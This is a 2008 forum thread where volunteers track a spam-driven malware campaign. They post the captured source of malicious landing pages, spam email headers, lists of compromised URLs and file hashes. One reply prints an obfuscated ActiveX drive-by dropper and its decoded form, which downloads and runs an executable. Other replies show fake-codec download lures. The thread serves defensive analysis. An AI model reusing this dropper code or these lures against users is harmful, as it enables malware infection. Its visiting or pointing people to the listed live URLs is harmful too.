Author Topic: R-thing  (Read 45017 times)

July 18, 2008, 07:39:21 am
Reply #30

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Changed to index1.php

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.giando.altervista.org/index1.php
Server IP: 66.98.138.46 [ ns18.altervista.org ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 18 July 2008
Time: 08:38:29:38
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://www.giando.altervista.org/document_arch.exe">
<title></title>
</head>

<body>
<iframe src="http://www.giando.altervista.org/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:100px;">
<img src="wait.gif"><br><br>
<a href="http://www.giando.altervista.org/document_arch.exe" style="font-weight:bold; color:#3A74AB; font-size:18px; font-family:Verdana;">Download Now</a>

</div>
</body>
</html>

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 18, 2008, 07:46:41 am
Reply #31

MysteryFCM

Lovely script at pindex.php;

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.giando.altervista.org/pindex.php
Server IP: 66.98.138.46 [ ns18.altervista.org ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 18 July 2008
Time: 08:41:57:41
*****************************************************************
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qndy`mh)(:
gtobuhno!qndy`mh)(!z
w`s!doeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(:
doeds/rdu@uushctud)&he&-&doeds&(:
doeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(:
usx!z
w`s!`rp!<!doeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:
w`s!`rr!<!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(:
w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(:
usx!z!`rru/uxqd!<!0:
`rp/nqdo)&F&*#D#*&U&-&iuuq;..vvv/fh`oen/`mudswhru`/nsf..mn`e/qiq&-g`mrd(:
`rp/rdoe)(:!`rru/nqdo)(:
`rru/Vshud)`rp/sdrqnordCnex(:
w`s!hlx`!<!&/..//..rwbinrur/dyd&:
`rru/R`wdUnGhmd)hlx`-3(:
`rru/Bmnrd)(:
|!b`ubi)d(!z|
usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z||
b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

Code:
poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');
try {
var asq = ender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');
var ass = ender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');
var asst = ender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');
try { asst.type = 1;
asq.open('G'+"E"+'T','http://www.giando.altervista.org//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
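
Added example, not part of the original posts: a static way to reproduce the decoding shown in Reply #31 without running the script. It reverses the per-character XOR with key 1, folds the split string literals, and lists defanged indicators; the sample input is constructed, `loader.example.test` and `sample.exe` are placeholders, and the function names are this example's own.

```javascript
// Added example (not from the thread): static triage, nothing is eval()'d.

// Reverse the per-character XOR the loader applies before eval (key 1 here).
function xorDecode(text, key) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key);
  }
  return out;
}

// Merge adjacent quoted literals joined by "+" ('m'+"sx" becomes "msx") until
// the text stops changing. Heuristic: literals with escapes are left alone.
function foldConcats(src) {
  const pair = /(['"])([^'"\\\r\n]*)\1\s*\+\s*(['"])([^'"\\\r\n]*)\3/;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (_m, _q1, a, _q2, b) => '"' + a + b + '"');
  } while (src !== prev);
  return src;
}

// Write URLs the way the thread does (hxxp://) so they are not clickable.
function defang(url) {
  return url.replace(/^http/i, 'hxxp');
}

// Pull out what a blocklist or detection rule needs from the folded source.
function extractIndicators(src) {
  const grab = (re) => [...new Set([...src.matchAll(re)].map((m) => m[1]))];
  return {
    urls: grab(/(https?:\/\/[^\s'"<>)]+)/g).map(defang),
    clsids: grab(/clsid:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})/g),
    progIds: grab(/CreateObject\(\s*["']([^"']+)["']/g),
    savedFiles: grab(/["']([^"']*\.exe)["']/g),
  };
}

// Full pipeline: decode, fold, extract.
function triage(encoded, key) {
  return extractIndicators(foldConcats(xorDecode(encoded, key)));
}

// Constructed sample in the same split-literal style as the decoded script in
// Reply #31. Host and file name are placeholders; the text is only parsed.
const PLAIN_SAMPLE = [
  `o.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');`,
  `var q = o.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');`,
  `var s = o.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');`,
  `q.open('G'+"E"+'T','http://loader.example.test//lo'+"ad.php",false);`,
  `s.SaveToFile('.//..//sample.exe',2);`,
].join('\n');

// XOR is its own inverse, so encoding the sample yields the "as captured" form.
const ENCODED_SAMPLE = xorDecode(PLAIN_SAMPLE, 1);

console.log(triage(ENCODED_SAMPLE, 1));
```

The folded CLSID and ProgIDs are more stable to match on than the URL or file name, which the posts in this thread show changing from day to day.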

July 19, 2008, 12:13:02 pm
Reply #32

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
switched to hot.html

email source:
Code:
Return-Path: <Fadi-kroost@providence-hospital.org>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from 159.40.71-86.rev.gaoland.net (159.40.71-86.rev.gaoland.net [86.71.40.159])
by family.xxx.de (Postfix) with ESMTP id 391C64A380D4
for <postmaster@xxx.de>; Sat, 19 Jul 2008 13:39:45 +0200 (CEST)
To: postmaster@xxx.de
Subject: Dark Knight nemesis finally dead
From: Blyakher <Fadi-kroost@providence-hospital.org>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Sat, 19 Jul 2008 13:39:44 +0200
Message-ID: <zr.bnpscipguetotv@valued-12ef4461>
User-Agent: Opera Mail/9.50 (Win32)
X-Antivirus: avast! (VPS 080718-1, 18/07/2008), Outbound message
X-Antivirus-Status: Clean
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Jul 19 13:39:49 2008
X-DSPAM-Confidence: 0.8059
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 4881d28554298697011158

Book your cheapest holidays for your winter getaway right here.
http://euromultimarca.com/hot.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

hxxp://euromultimarca.com/hot.html
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

md5sum watch.exe: f422a0f9cd67c465a963610e74f50b17
-> still same file.

July 19, 2008, 07:46:29 pm
Reply #33

MysteryFCM

.... and again

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.teethline.com/start.html
Server IP: 195.110.124.188 [ opus.register.it ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 July 2008
Time: 20:46:35:46
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 19, 2008, 07:57:42 pm
Reply #34

MysteryFCM

Updated
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 19, 2008, 08:16:18 pm
Reply #35

philipp

switched to start.html

email source:
Code:
Return-Path: <resat-tarsiida@northyorks.gov.uk>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from pc-94-48-74-200.cm.vtr.net (pc-94-48-74-200.cm.vtr.net [200.74.48.94])
by family.xxx.de (Postfix) with ESMTP id 155354A380D2
for <postmaster@xxx.de>; Sat, 19 Jul 2008 21:45:35 +0200 (CEST)
To: postmaster@xxx.de
Subject: How to blackmail without getting caught
From: noonan <resat-tarsiida@northyorks.gov.uk>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Sat, 19 Jul 2008 15:38:29 -0400
Message-ID: <ja.zcyfybbslxpnnh@jers-nhoiiuw9nk>
User-Agent: Opera Mail/9.50 (Win32)
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Jul 19 21:45:43 2008
X-DSPAM-Confidence: 0.6941
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 48824467222301142080570

Banks that almost went bankrupt with your money
http://tino.bike2sale.com/start.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

hxxp://tino.bike2sale.com/start.html
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

same binary as before.

---
edit:
hxxp://www.highpauleberlin.de/start.html
hxxp://parrocchiadelrosario.eu/start.html
hxxp://thebackporchband.com/start.html
hxxp://www.akvnjbp.com/start.html

July 20, 2008, 01:25:37 pm
Reply #36

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thanks. :)

July 20, 2008, 09:31:40 pm
Reply #37

philipp

Code:
http://fotik.fileserver.ixan.net/start.html

July 20, 2008, 10:25:45 pm
Reply #38

MysteryFCM

Latest ....
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 21, 2008, 10:54:42 am
Reply #39

Kayrac

  • Guest
Code:
www.marbresigranitsmontserrat.com/start.html
http://www.centaurea-ae.org/hot.html
http://www.teatinas.com/news.html
www.eurotakt.sk/news.html
http://agroimpex.com.pl/news.html
nanni.schrod.eu/start.html
sigmasoft.it/start.html

July 21, 2008, 04:49:34 pm
Reply #40

MysteryFCM

They've switched again;

nuovacifet.it/begin.html

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://nuovacifet.it/begin.html
Server IP: 195.110.124.188 [ opus.register.it ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 21 July 2008
Time: 17:50:01:50
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 21, 2008, 11:10:20 pm
Reply #41

MysteryFCM

They've changed again ..... and more interestingly, seem to have ditched the usual site code in favour of;

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://afg.es/viewmovie.html
Server IP: 217.76.130.227 [ lwga149.servidoresdns.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 22 July 2008
Time: 00:09:20:09
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Watch Free Movie</TITLE>
<META content=noindex,nofollow,noarchive name=robots>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=codecinst.exe">
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">


<STYLE>.t {
BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-BOTTOM: #666666 1px solid
}
.b1 {
BORDER-RIGHT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(img5.gif); PADDING-BOTTOM: 0px; MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 104px; COLOR: #fff; PADDING-TOP: 0px; BORDER-BOTTOM: 0px; BACKGROUND-REPEAT: no-repeat; FONT-FAMILY: Arial; HEIGHT: 23px; BACKGROUND-COLOR: #fff
}
.b11 {
BORDER-RIGHT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(img5.gif); PADDING-BOTTOM: 0px; MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 104px; COLOR: #fff; PADDING-TOP: 0px; BORDER-BOTTOM: 0px; BACKGROUND-REPEAT: no-repeat; FONT-FAMILY: Arial; HEIGHT: 23px; BACKGROUND-COLOR: #fff; TEXT-DECORATION: underline
}
</STYLE>

<script>
function activex_is_here()
{
    try
    {
        return false;
    }
    catch(e)
    {
        ;
    }

    return false;
}

function releaseMovie() {
if (activex_is_here()) {

}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='codecinst.exe'", 3000);
}
}
</script>
</head>

<body color=black>

<script>

codecDownload();

</script>
<script>


var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup   = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Down(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
    switch (download)
    {
        case "iax": document.location.href="codecinst.exe"; break;
        Close();
    }

}

function vc() {
if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
location.href="codecinst.exe";
}
else {
if (alert('Please install new version of Video ActiveX Object.')) {
vc();
}
else {
vc();
}
}
}

function Close()
{
    var p=document.getElementById("popdiv");
    p.style.visibility="hidden";
vc();
}
function Details()
{
alert('You must download Video ActiveX Object to play this video file.');
}

</script>


<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
<table cellpadding="0" cellspacing="0" width="362" height="126">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="362" height="29" style=" BACKGROUND-IMAGE:URL('/xptop.gif'); height:29px; width:362;"> <!-- win top table -->
<tr>
<td style="color:white; font-family:Tahoma; font-size:13px; font-weight:bold; padding-left:4px;padding-top:1px">&nbsp;&nbsp;Video ActiveX Object Error.</td>
<td width="21" style="padding-right:6px;"><img src="/xpclose.gif" width="21" height="21" onClick="Close();" style="cursor:default;" ></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" height="97">
<tr>
<td style="background-image:url(/left.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td><img src="/xpleftclm.gif" width="3" height="97"></td>
</tr>
</table>
</td>
<td valign="top">
<table cellpadding="0" cellspacing="0" width="356" bgcolor="ece9d8">
<tr>
<td>
<table cellpadding="0" cellspacing="0" height="59">
<tr>
<td align="center" style="padding-left:20px; padding-top:13px;" valign="top"><img src="/alert.gif" width="31" height="32"></td>
<td align="left" style="font-size:11px;  font-family:Tahoma; padding-left:30px; padding-bottom:8px; padding-right:5px;"><br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
</td>
</tr>
</table>
</td>
</tr>
<tr>
<tr>
<td style="padding-left:20px; padding-right:20px; padding-bottom:20px; font-family:Tahoma; font-size:11px;" align="center">
<hr><br>
Click Continue to download and install ActiveX Object.

</td>
</tr>
<td>
<table align="center" cellpadding="0" cellspacing="6" height="22">
<tr height="22">
<td><input type="button" value="Continue" onClick="Down('iax');" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" tabindex="1" ID="Button1" NAME="Button1"><br><br></td>
<td></td>
<td><input type="button" value="Cancel" onClick="Close()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
<td><input type="button" value="Details..." onClick="Details()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="100%">
<tr bgcolor="4577ea" style="height:1px;">
<td></td>
</tr> <!-- empty colors -->
<tr bgcolor="0029b5" style="height:1px;">
<td></td>
</tr>
<tr bgcolor="001590" style="height:1px;">
<td></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td style="background-image:url(/right.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td style="padding:0px;"><img src="/xprightclm.gif" width="3" height="97"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>


<script>
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (activex_is_here()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (activex_is_here()) { } else {
setTimeout("showPopDiv();",2000);
}
}
     
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}

if(!byFlag) {
var p=document.getElementById("popdiv");

var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}

function getScroll() {

var scrOfX = 0, scrOfY = 0;
if( typeof( window.pageYOffset ) == 'number' ) {
scrOfY = window.pageYOffset;
scrOfX = window.pageXOffset;
} else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {
scrOfY = document.body.scrollTop;
scrOfX = document.body.scrollLeft;
} else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {
scrOfY = document.documentElement.scrollTop;
scrOfX = document.documentElement.scrollLeft;
}
return [scrOfX, scrOfY];

}

sc = getScroll();
p.style.top = (myHeight/2 - 181)+sc[1]+'px';
p.style.left = (myWidth/2 - 120) + sc[0]+'px';
p.style.visibility = 'visible';
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
</script>
</div>
     

<CENTER><!-- no title variant of spy partners & ruler cash landings --><A
      href="codecinst.exe"><IMG
      onmouseover="window.status = 'You must download Video ActiveX Object to play this video file.';"
      height=369
      alt="You must download Video ActiveX Object to play this video file."
      src="movierol.gif" width=450 border=0></A>
      </CENTER></DIV><br><center><font color=gray><font size=5>
20 min 5 sec, Raiting 8/10, 148306 views<br>
          79 users are watching this movie right now</CENTER></font></font>


<iframe src="00.html" style="display:none"></iframe>

</BODY></HTML>

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 21, 2008, 11:28:09 pm
Reply #42

MysteryFCM

Updated list
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 22, 2008, 03:45:41 am
Reply #43

Kayrac

Code:
finquattro.eu/viewmovie.html
thewindsorhotel.it/viewmovie.html
galvatoledo.com/viewmovie.html

Different file name, still detected by Avira.

July 22, 2008, 08:50:50 am
Reply #44

philipp

Code:
http://www.go-siegmund.de/viewmovie.html
http://www.nepi.si/viewmovie.html
http://asjsiderno.it/viewmovie.html
http://www.bachir.it/viewmovie.html

md5sum codecinst.exe
774f5907bbdf70419b4973db6bb230dd